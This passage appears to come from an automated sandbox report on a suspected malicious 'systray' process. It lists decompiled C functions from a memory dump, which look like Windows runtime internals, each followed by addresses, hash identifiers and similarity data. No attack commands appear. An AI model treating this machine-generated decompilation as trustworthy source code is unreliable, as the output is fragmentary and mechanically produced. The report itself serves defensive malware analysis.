				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4685350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4687bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E045D97C0();
				}
				if( *0x46879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x46879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E045C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E045B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0462FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E045D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E045CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L045EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4686901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4686901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E045D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E045D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E045B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E045B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04617016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0462FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4685350;
							if(_t109 != 0x4685350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0462FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04625720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04592d8a
0x04592d8a
0x04592d92
0x04592d96
0x04592d9e
0x04592da0
0x04592da3
0x04592da5
0x04592da8
0x04592dab
0x04592db2
0x045ef9aa
0x045ef9ab
0x045ef9ae
0x045ef9ae
0x04592db8
0x04592dc2
0x045ef9b9
0x045ef9be
0x045ef9bf
0x045ef9bf
0x04592dcf
0x045ef9c9
0x04592dd5
0x04592dd5
0x04592dd5
0x04592dde
0x04592de1
0x04592e70
0x04592e72
0x04592e72
0x04592de7
0x04592deb
0x04592e7c
0x04592e83
0x04592e85
0x04592e8b
0x04592e8d
0x04592e92
0x04592e92
0x04592e85
0x04592df1
0x04592df7
0x04592df9
0x04592df9
0x04592dfc
0x04592dff
0x04592e02
0x00000000
0x04592e05
0x04592e0c
0x045ef9d9
0x04592e12
0x04592e12
0x04592e12
0x04592e1a
0x045ef9e3
0x045ef9e9
0x045ef9f0
0x045ef9f6
0x045ef9f8
0x045ef9f8
0x045ef9f0
0x04592e23
0x045efa02
0x045efa03
0x045efa05
0x045efa06
0x00000000
0x04592e29
0x04592e29
0x04592e2e
0x04592e34
0x04592e3e
0x00000000
0x00000000
0x04592e44
0x04592e47
0x04592e4d
0x00000000
0x00000000
0x04592e4f
0x04592e54
0x00000000
0x00000000
0x04592e5a
0x04592e5f
0x04592e9a
0x04592ea4
0x04592ea5
0x04592ea8
0x04592eaf
0x04592eb2
0x04592eb5
0x045efae9
0x045efaeb
0x045efaed
0x045efaef
0x045efaf7
0x045efaf8
0x045efafd
0x045efaff
0x045efb04
0x045efb04
0x045efaff
0x04592ec0
0x04592ec4
0x04592ec6
0x04592ec8
0x045efb14
0x045efb18
0x045efb1e
0x045efb21
0x045efb21
0x04592ece
0x04592ece
0x04592ece
0x04592ed7
0x04592e61
0x04592e63
0x045efa6b
0x045efa71
0x045efa76
0x045efa78
0x045efa8a
0x045efa7a
0x045efa83
0x045efa83
0x045efa8f
0x045efa91
0x045efa97
0x045efa9d
0x045efaa4
0x045efaaa
0x045efaaf
0x045efab1
0x045efac3
0x045efab3
0x045efabc
0x045efabc
0x045efac8
0x045efacb
0x045efadf
0x045efadf
0x045efacb
0x045efaa4
0x045efa91
0x04592e6f
0x04592e6f
0x04592e5f
0x045efa13
0x045efa15
0x045efa17
0x045efa1f
0x045efa21
0x045efa22
0x045efa25
0x045efa28
0x045efa2f
0x045efa2f
0x045efa2a
0x045efa2a
0x045efa2a
0x045efa31
0x045efa34
0x045efa36
0x045efa3c
0x045efa3e
0x045efa41
0x045efa43
0x045efa45
0x045efa45
0x045efa41
0x045efa3c
0x045efa4a
0x045efa4f
0x045efa51
0x045efa53
0x045efa56
0x045efa5b
0x045efa5e
0x00000000
0x045efa5e
0x04592e23

Strings

RTL: Re-Waiting, xrefs: 045EFA4A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 828827844de736da32bf0fc22c3196211fa95093e761d570279130203c47d7ae
Instruction ID: 33487aac9c35ec2620d4fc71f37833631efb430e431d85b312ed8b220d7f3fc1
Opcode Fuzzy Hash: 828827844de736da32bf0fc22c3196211fa95093e761d570279130203c47d7ae
Instruction Fuzzy Hash: E261F471A00605BFEB25DF69D880B7A77E5FB84318F180A99E4519B2C0EB34BD01B781

Uniqueness

Uniqueness Score: -1.00%

Function 04660EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04660EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0465FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04661074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E045D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0465A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0465A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4688b04 >> 0x14) + (_v44 -  *0x4688b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E045B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0465138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E045B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0464FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4688724 & 0x00000008) != 0) {
						E046552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E046615B5(0x4688ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x04660eb7
0x04660eb9
0x04660ec0
0x04660ec2
0x04660ecd
0x0466105b
0x0466105b
0x04661061
0x04661066
0x04661066
0x0466106b
0x04661073
0x04661073
0x04660ed3
0x04660ed6
0x04660edc
0x04660ee0
0x04660ee7
0x04660ef0
0x04660ef5
0x04660efa
0x04660efc
0x04660efd
0x04660f03
0x04660f04
0x04660f06
0x04660f07
0x04660f09
0x04660f0e
0x04660f14
0x04660f23
0x04660f2d
0x04660f34
0x04660f34
0x04660f14
0x04660f52
0x00000000
0x00000000
0x04660f58
0x04660f73
0x04660f74
0x04660f79
0x04660f7d
0x04660f80
0x04660f86
0x04660fab
0x04660fb5
0x04660fc6
0x04660fd1
0x04660fe3
0x04660fd3
0x04660fdc
0x04660fdc
0x04660feb
0x04661009
0x04661009
0x04661015
0x04661027
0x04661017
0x04661020
0x04661020
0x0466102f
0x0466103c
0x0466103c
0x04661048
0x04661050
0x04661050
0x04661055
0x00000000
0x04661055
0x04660f88
0x04660f9e
0x04660fa2
0x04660fa9
0x00000000
0x00000000
0x00000000
0x04660fa9
0x00000000

Strings

`, xrefs: 04660F16

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: c3035da543dbd532bdb213592d9d4c996a7948b257eb032fc6a728b27f525def
Instruction ID: 1dcd74df8d3670e46e7b88b7fe1a1bef7b9c9801dfdc8862caf9fcf58ab22c88
Opcode Fuzzy Hash: c3035da543dbd532bdb213592d9d4c996a7948b257eb032fc6a728b27f525def
Instruction Fuzzy Hash: E651B0712043829FE724DF29D984B5BB7E5EBC5704F044A2DF99697290EB70F805C762

Uniqueness

Uniqueness Score: -1.00%

Function 045CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E045CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E045B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E045D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E045D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E045D95D0();
							goto L11;
						} else {
							_t109 = L045B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E045DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E045D95D0();
										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x045cf0d3
0x045cf0d9
0x045cf0e0
0x045cf0e7
0x045cf0f2
0x045cf0f4
0x045cf0f8
0x045cf100
0x045cf108
0x045cf10d
0x045cf115
0x045cf116
0x045cf11f
0x045cf123
0x045cf124
0x045cf12c
0x045cf130
0x045cf134
0x045cf13d
0x045cf144
0x045cf14b
0x045cf152
0x0460bab0
0x0460bab0
0x045cf158
0x045cf158
0x045cf15a
0x045cf160
0x045cf165
0x045cf166
0x045cf16f
0x045cf173
0x0460baa7
0x0460baa7
0x0460baab
0x00000000
0x045cf179
0x045cf18d
0x045cf191
0x0460baa2
0x00000000
0x045cf197
0x045cf19b
0x045cf1a2
0x045cf1a9
0x045cf1af
0x045cf1b2
0x045cf1b6
0x045cf1b9
0x045cf1c4
0x045cf1d8
0x045cf1df
0x045cf1e3
0x045cf1eb
0x045cf1ee
0x045cf1f4
0x045cf20f
0x0460bab7
0x0460babb
0x0460bacc
0x0460bad1
0x045cf215
0x045cf218
0x045cf226
0x045cf22b
0x00000000
0x045cf22b
0x045cf1f6
0x045cf1f6
0x045cf1f9
0x045cf1fb
0x045cf1fb
0x045cf1f4
0x045cf191
0x045cf173
0x045cf152
0x045cf203

Strings

@, xrefs: 045CF124

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 82f21bca85423e0a54e827a83eab8144be05e6f4b33d00b642a0d1db369b1fee
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 01518D72604711AFD320DF59C840A6BBBF9FF88B14F008A2DF99587690E7B4E904DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04613540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04613540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x468d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E045D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04613706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E045DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04613540;
						E045DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E045EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04620C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E045D97C0();
					}
					return E045DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04613971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04613884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E045DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E045D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04613787(_a4,  &_v352, _t80);
						}
					}
					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E045D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04613552
0x0461355a
0x0461355d
0x04613566
0x04613567
0x0461357e
0x0461358f
0x046135a1
0x046135a5
0x0461366b
0x0461366b
0x0461366d
0x04613672
0x04613679
0x04613685
0x0461368d
0x0461369d
0x046136a7
0x046136b8
0x046136c6
0x046136c7
0x046136dc
0x046136e1
0x046136e7
0x046136e9
0x046136e9
0x04613703
0x04613703
0x046135b5
0x046135c0
0x046135c4
0x00000000
0x00000000
0x046135ca
0x046135d7
0x046135e2
0x046135e6
0x046135e8
0x046135f5
0x046135fa
0x04613603
0x04613604
0x04613609
0x0461360a
0x04613612
0x04613613
0x0461361e
0x04613622
0x04613628
0x0461362f
0x0461362f
0x04613636
0x04613638
0x0461363b
0x04613642
0x04613642
0x04613636
0x04613657
0x04613657
0x0461365c
0x04613662
0x04613669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0461358F

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: a8059a5de2f49a4bfd8ebb0a13f9f252ca35098c5fe0f1a7325c6ed3a26c60da
Instruction ID: 256649d0854f5bda9e44f2a6cacb251a334f579ede67b327d853694a52eaaedb
Opcode Fuzzy Hash: a8059a5de2f49a4bfd8ebb0a13f9f252ca35098c5fe0f1a7325c6ed3a26c60da
Instruction Fuzzy Hash: 534126F1D0052D9BEB21DA54CC80FDEB77CAF44718F0445A5EA09A7250EB30AE88DF95

Uniqueness

Uniqueness Score: -1.00%

Function 04613884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04613884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E045D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L045B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E045D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04613893
0x04613896
0x04613899
0x0461389f
0x046138a0
0x046138a4
0x046138a9
0x046138ac
0x046138ad
0x046138ae
0x046138af
0x046138b1
0x046138b4
0x046138bb
0x046138bc
0x046138bd
0x046138c4
0x046138c8
0x046138ca
0x046138ca
0x046138d5
0x0461393e
0x04613940
0x04613942
0x04613952
0x04613954
0x04613961
0x04613961
0x04613967
0x0461396e
0x0461396e
0x04613947
0x0461394c
0x00000000
0x0461394c
0x046138ea
0x046138ee
0x046138f8
0x046138f9
0x046138ff
0x04613900
0x04613902
0x04613903
0x0461390b
0x0461390f
0x04613950
0x00000000
0x04613950
0x04613915
0x0461391d
0x0461391d
0x04613922
0x04613926
0x00000000
0x04613928
0x0461392b
0x0461392b
0x04613935
0x04613937
0x04613937
0x00000000
0x04613935
0x04613926
0x046138f0
0x00000000

Strings

BinaryName, xrefs: 046138B4

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: b622d3803b10f52d7816d13f43da577c94247f790fd2c4a334392db1234b5910
Instruction ID: 55a4732194e5f268f3cf272ee14a0d6adac29de05de34bd15d2abaca988776a9
Opcode Fuzzy Hash: b622d3803b10f52d7816d13f43da577c94247f790fd2c4a334392db1234b5910
Instruction Fuzzy Hash: 5A31F17290050AAFFB25DE58C945EABB774FB80B20F054569ED16A7760F630BE80D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 045CD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E045CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x468d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E045B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E045DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E045D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E045D95D0();
					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x045cd29c
0x045cd2a6
0x045cd2b1
0x045cd2b5
0x045cd2b6
0x045cd2bc
0x045cd2bd
0x045cd2be
0x045cd2bf
0x045cd2c2
0x045cd2c4
0x045cd2cc
0x045cd384
0x045cd34b
0x045cd34f
0x045cd350
0x045cd351
0x045cd35c
0x045cd35c
0x045cd2d6
0x045cd2da
0x045cd2e1
0x045cd361
0x045cd369
0x045cd36d
0x045cd2e3
0x045cd2e3
0x045cd2e3
0x045cd2e5
0x045cd2ed
0x045cd2f5
0x045cd2fa
0x045cd302
0x045cd303
0x045cd30b
0x045cd30f
0x045cd313
0x045cd318
0x045cd31c
0x045cd320
0x045cd379
0x045cd37d
0x00000000
0x00000000
0x0460affe
0x0460b001
0x0460b011
